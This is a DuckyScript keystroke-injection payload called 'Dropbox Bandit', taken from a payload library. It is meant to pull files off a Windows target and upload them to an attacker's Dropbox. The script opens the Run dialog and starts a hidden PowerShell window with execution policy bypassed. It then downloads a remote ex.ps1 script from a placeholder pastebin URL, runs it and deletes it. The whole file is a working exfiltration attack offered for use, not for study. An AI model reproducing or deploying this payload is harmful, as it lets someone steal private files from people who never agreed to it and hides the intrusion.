Path: blob/master/payloads/library/exfiltration/Dropbox-Bandit/payload_duckyscript_old.txt
2968 views
REM Title: Dropbox Bandit1REM Author: Factor (github.com/Factor101)2REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account3REM Target: Windows 10/11 (Powershell)4REM Version: 1.05REM Category: Exfiltration67REM Inital Delay8DELAY 500910REM Open CMD11GUI r12REM Delay to allow window to open13DELAY 10014REM Launch hidden powershell window to execute our script1516REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here17REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=018REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>19REM --------- replace me! ----------20STRING powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"21DELAY 20022ENTER2324REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky25CAPSLOCK2627